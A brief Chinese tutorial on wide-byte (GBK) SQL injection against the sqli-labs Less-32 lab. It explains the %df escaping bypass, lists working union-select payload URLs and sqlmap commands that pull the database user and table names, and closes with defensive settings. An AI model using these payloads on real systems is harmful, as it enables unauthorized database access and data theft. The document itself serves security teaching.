01 宽字节注入原理
什么是宽字节
GB2312、GBK、GB8030、BIG5、Shift_JIS等这些都是常说的宽字节,实际为两字节。
站点可能为了防止SQL注入,会加\转义’,最后变成'
MySQL在使用GBK编码的时候,会认为两个字符为一个汉字。
使用%df’进行编码,两个字符组合,认为是一个汉字。
注:前一个Ascii码大于128才能到汉字的范围
02 宽字节注入方法
http://127.0.0.1/sqli-labs/Less-32/?id=%df' union select 1,(select user()),3--+
http://127.0.0.1/sqli-labs/Less-32/?id=%df' union select 1,(select table_name from information_schema.tables where table_schema=database() limit 0,1),3--+ // 查表
sqlmap:
sqlmap -u "http://127.0.0.1/Less-32/?id=1" // 判断id不是注入点 因为被转义
sqlmap -u "http://127.0.0.1/Less-32/?id=1%df" // 通过宽字节注入
宽字节注入应对策略:
使用utf-8,避免宽字节注入;
ps:不仅在gbk,韩文、日文等等都是宽字节,都有可能存在宽字节注入漏洞。mysql_real_escape_string,mysql_set_charset(‘gbk’,$conn) // 替换 和 编码 两个函数一起使用
可以设置参数,charcater_set_client=binary // 设置mysql的连接参数,使用二进制模式